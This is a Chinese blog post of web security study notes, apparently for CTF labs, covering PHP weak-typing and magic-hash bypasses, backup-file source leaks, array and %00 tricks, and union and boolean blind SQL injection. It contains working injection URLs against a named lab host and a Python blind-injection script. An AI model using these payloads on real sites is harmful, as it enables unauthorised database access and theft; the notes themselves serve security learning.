web安全基础学习笔记

1.使用hackbar

通过hackbar在浏览器发送请求包就能得到请求内容。
在这里插入图片描述

2.php漏洞基本分析 弱类型语言

在这里插入图片描述
如果字符串跟数字匹配会自动转换成数字。
在这里插入图片描述
案例
在这里插入图片描述

2.2 php漏洞找到隐藏的源代码之 index.php~

index.php是一个用PHP语言开发的网站的首页,index是普遍意义上的“首页”,也就是你输入一个域名后会打开一个页面,基本上就是index.xxxx(基本上首页都不会把index.xxxx显示在url里,但也不绝对) 使用index.php~下载到源代码
在这里插入图片描述
下载到源文件后发现代码需要输入两个相同的md5进行判断才给通过。所以这道题可以用0e开头的md5进行绕过。

处理hash字符串时,PHP会将每一个以 0E开头的哈希值解释为0,那么只要传入的不同字符串经过哈希以后是以 0E开头的,那么PHP会认为它们相同

下面是一些哈希后0E开头的字符

s878926199a
0e545993274517709034328855841020
s155964671a
0e342768416822451524974117254469
s214587387a
0e848240448830537924465865611904
s214587387a
0e848240448830537924465865611904
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s1885207154a
0e509367213418206700842008763514
s1502113478a
0e861580163291561247404381396064
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s155964671a
0e342768416822451524974117254469
s1184209335a
0e072485820392773389523109082030
s1665632922a
0e731198061491163073197128363787
s1502113478a
0e861580163291561247404381396064
s1836677006a
0e481036490867661113260034900752
s1091221200a
0e940624217856561557816327384675
s155964671a
0e342768416822451524974117254469
s1502113478a
0e861580163291561247404381396064
s155964671a
0e342768416822451524974117254469
s1665632922a
0e731198061491163073197128363787
s155964671a
0e342768416822451524974117254469
s1091221200a
0e940624217856561557816327384675
s1836677006a
0e481036490867661113260034900752
s1885207154a
0e509367213418206700842008763514
s532378020a
0e220463095855511507588041205815
s878926199a
0e545993274517709034328855841020
s1091221200a
0e940624217856561557816327384675
s214587387a
0e848240448830537924465865611904
s1502113478a
0e861580163291561247404381396064
s1091221200a
0e940624217856561557816327384675
s1665632922a
0e731198061491163073197128363787
s1885207154a
0e509367213418206700842008763514
s1836677006a
0e481036490867661113260034900752
s1665632922a
0e731198061491163073197128363787
s878926199a
0e545993274517709034328855841020
240610708 
0e462097431906509019562988736854
314282422 
0e990995504821699494520356953734
571579406 
0e972379832854295224118025748221
903251147 
0e174510503823932942361353209384
1110242161 
0e435874558488625891324861198103
1320830526 
0e912095958985483346995414060832
1586264293 
0e622743671155995737639662718498
2302756269 
0e250566888497473798724426794462
2427435592 
0e067696952328669732475498472343
2653531602 
0e877487522341544758028810610885
3293867441 
0e471001201303602543921144570260
3295421201 
0e703870333002232681239618856220
3465814713 
0e258631645650999664521705537122
3524854780 
0e507419062489887827087815735195
3908336290 
0e807624498959190415881248245271
4011627063 
0e485805687034439905938362701775
4775635065 
0e998212089946640967599450361168
4790555361 
0e643442214660994430134492464512
5432453531 
0e512318699085881630861890526097
5579679820 
0e877622011730221803461740184915
5585393579 
0e664357355382305805992765337023
6376552501 
0e165886706997482187870215578015
7124129977 
0e500007361044747804682122060876
7197546197 
0e915188576072469101457315675502
7656486157 
0e451569119711843337267091732412
QLTHNDT 
0e405967825401955372549139051580
QNKCDZO 
0e830400451993494058024219903391
EEIZDOI 
0e782601363539291779881938479162
TUFEPMC 
0e839407194569345277863905212547
UTIPEZQ 
0e382098788231234954670291303879
UYXFLOI 
0e552539585246568817348686838809
IHKFRNS 
0e256160682445802696926137988570
PJNPDWY 
0e291529052894702774557631701704
ABJIHVY 
0e755264355178451322893275696586
DQWRASX 
0e742373665639232907775599582643
DYAXWCA 
0e424759758842488633464374063001
GEGHBXL 
0e248776895502908863709684713578
GGHMVOE 
0e362766013028313274586933780773
GZECLQZ 
0e537612333747236407713628225676
NWWKITQ 
0e763082070976038347657360817689
NOOPCJF 
0e818888003657176127862245791911
MAUXXQC 
0e478478466848439040434801845361
MMHUWUV 
0e701732711630150438129209816536

2.3 php漏洞找到隐藏的源代码之 vim的临时文件 /.index.php.swp

用户在使用vim编辑,意外退出时,会在当前目录生成备份文件

以 index.php 为例 第一次产生的缓存文件名为 .index.php.swp
第二次意外退出后,文件名为.index.php.swo
第三次产生的缓存文件则为 .index.php.swn
注意:index前有 " . "
在这里插入图片描述

3.php漏洞基本分析 数组

在这里插入图片描述
题目要求输入的v3必须跟flag的一致才能给你返回。
php的某些函数是不能输入数组的,如果强行输入数组会返回一个null,而在php中对null中取非他就是True.

只要看到一个只能接收字符串的输入,就往里面灌入一个其他类型的函数,可能会有意想不到的结果。

这道题也是一样只要注入一个不同的数组就能得到结果。

/?v1[]=1&v2[]=2&v3[]=3 直接灌入数组

在这里插入图片描述

3.php漏洞基本分析 extract

extract 把数组转换成变量名和变量值的生命。
在这里插入图片描述

该函数使用数组键名作为变量名,使用数组键值作为变量值。针对数组中的每个元素,将在当前符号表中创建对应的一个变量。

这道题可以通过强行传入数组或者传入空值来解决。

/extract.php/?aurora&flage 直接不写内容就是空

4.php漏洞基本分析 strpos eregi函数漏洞

案例
在这里插入图片描述
这道题可以用数组绕过。

4.php漏洞基本分析 eregi函数漏洞

eregi函数在进行匹配的时候,如果碰到%00会意味着字符串的结束,因此我们只需要传入%001234,他截取到%00后匹配的时候就会变成111,111在1114中,成功绕过

案例 https://blog.csdn.net/m0_52432374/article/details/113647955?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-0-113647955-blog-124258277.235^v43^control&spm=1001.2101.3001.4242.1&utm_relevant_index=3

5.SQL注入漏洞分析

只要通过让他的语句结果为真就可以进行注入,找到注入点让他的结果不一样
在这里插入图片描述

5.1 整数型 联合注入

5.1.1 判断注入点

条件1 回显结果到网页
在这里插入图片描述
案例页面 输入的结果可以显示到网页中。
在这里插入图片描述
他的注入点就在输入的地方。在原来数据查询的基础上增加一个条件,同时要求他这个条件成立。

/1.php?id=2 and 1=0 通过在注入点后面增加sql语句就可以发现原始的sql有没有拼接我们新加进去的语句。如果加进去了就证明注入点可用。

5.1.2 判断列数

通过拼接order by来猜测数据有多少列,因为超过后会直接报错。

?id=2 order by 4

5.1.3 查询库名

通过拼接 union 来查询数据库名

/1.php?id=0 union select 1,2,database()

在这里插入图片描述

5.1.4 查询表名

在这里插入图片描述

通过之前查询出来的数据库,查询这个库里面的全部表
/1.php?id=0 union select 1,2,group_concat(table_name) from information_schema.tables where%20table_schema= ‘ctf’

5.1.4 查询数据库列名

/1.php?id=0 UNION SELECT 1,2,group_concat(COLUMN_NAME) FROM information_schema.columns WHERE table_name = ‘answer’

在这里插入图片描述

5.1.4 查询结果

/1.php?id=0 UNION select 1,2,flag from answer

在这里插入图片描述

5.1 字符型 联合注入

把内容加成了字符型,如果使用之前的1=1的方式会被带成一个整体带入请求里面也就是字符串。
在这里插入图片描述
解决方案
在这里插入图片描述
跟之前的方式一样,不过要添加一个闭合引号以及注释引号
在这里插入图片描述
步骤还是跟之前的一样就是添加了几个引号
在这里插入图片描述

5.3 布尔盲注

没有结果的回显。
在这里插入图片描述
解决办法
在这里插入图片描述
案例

在这里插入图片描述
通过sql语句的返回真假 去猜测这个数据库的长度。
在这里插入图片描述

盲注常用函数

在这里插入图片描述
通过这些语句猜测数据库里面的库和表名,暴力破解的方式进行猜测。

编写布尔盲注脚本

使用盲注脚本进行暴力破解

# 导入requests发送请求,导入re正则表达式对响应包进行筛选
import re
import requests


# 首先测试一下是否能够正常访问到测试地址
url = "http://test.com"
url_template = "http://test.com/Less-8/?id=1' and length((select database()))=8--+"
len = 0
# DBname = ''
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 '
                 '(KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'}
response = requests.get(url_template,headers = headers)
print(response)


def GetDBName():
    # 获取数据库的长度
    print("----------测试数据库长度--------------")
    url_template = "http://test.com/Less-8/?id=1' and length((select database()))={}--+"
    for i in range(1, 99):
        current_url = url_template.format(i)
        response = requests.get(current_url, headers=headers)
        if re.search(r'You are in',response.text):
            len = i
            print("数据库长度为:", i)
            break

    # 测试数据库名称
    print("----------测试数据库名--------------")
    DBname = ''
    url_template1 = "http://test.com/Less-8/?id=1%27%20and%20ascii(substr((select%20database()),{},1))={}--+"
    for i in range(1, len+1):
        for j in range(33, 127):
            # 拼接构造需要的测试的URL地址,通过format函数批量构造
            current_url1 = url_template1.format(i, j)
#            print(current_url1)

            # 发送请求
            response1 = requests.get(current_url1, headers=headers)

            # 判断是否成功
            if re.search(r'You are in', response1.text):
                DBname += chr(j)
                print("数据库名为:", DBname)
                break

if __name__ == '__main__':
    GetDBName()



6 SQL注入实操

找到列数后查询库名。

/?r=content&cid=0%27%20union%20select%201,2,3,4,5,6,7,8,9,10,database(),12,13%23
在这里插入图片描述

在查询他的表名

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0' union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13 from information_schema.tables where 
 table_schema='cuni'%23

在这里插入图片描述
列名查询数

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0%27%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,group_concat(COLUMN_NAME),12,13%20FROM%20information_schema.columns%20WHERE%20table_name%20=%20%27adword%27%23union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name),12,13%20from%20information_schema.tables%20where%20table_schema=%27cuni%27%23

在这里插入图片描述

查询数据库内容

http://fce98831-8235-42a8-8d92-aa3cd5b77fbc.node.kanxue.com:81/?r=content&cid=0' UNION select 1,2,3,4,5,6,7,8,9,10,date,12,13 from content %23

在这里插入图片描述

7 PHP反序列化漏洞分析与实操讲解

在这里插入图片描述
在这里插入图片描述

序列号只能序列化属性,不序列化方法在这里插入图片描述

在这里插入图片描述
样例
在这里插入图片描述
魔术方法介绍:https://blog.csdn.net/weixin_45954730/article/details/131861020在这里插入图片描述

8 文件上传漏洞

在这里插入图片描述
在这里插入图片描述

相关推荐

  1. Web学习笔记——网络安全

    2024-06-07 15:48:03       26 阅读

最近更新

  1. TCP协议是安全的吗?

    2024-06-07 15:48:03       18 阅读
  2. 阿里云服务器执行yum,一直下载docker-ce-stable失败

    2024-06-07 15:48:03       19 阅读
  3. 【Python教程】压缩PDF文件大小

    2024-06-07 15:48:03       19 阅读
  4. 通过文章id递归查询所有评论(xml)

    2024-06-07 15:48:03       20 阅读

热门阅读

  1. Unity Shader基础知识的入门了解

    2024-06-07 15:48:03       12 阅读
  2. 【Android】解决AndroidStudio无法预览layout.xml的问题

    2024-06-07 15:48:03       10 阅读
  3. 云WAF的负载均衡和流量分发功能

    2024-06-07 15:48:03       11 阅读
  4. Android - RadioGroup中多个radiobutton同时被选中问题

    2024-06-07 15:48:03       7 阅读
  5. CSS -webkit-text-security

    2024-06-07 15:48:03       8 阅读
  6. PDF格式分析(八十五)——水印注释(Watermark)

    2024-06-07 15:48:03       13 阅读
  7. python 第一天

    2024-06-07 15:48:03       10 阅读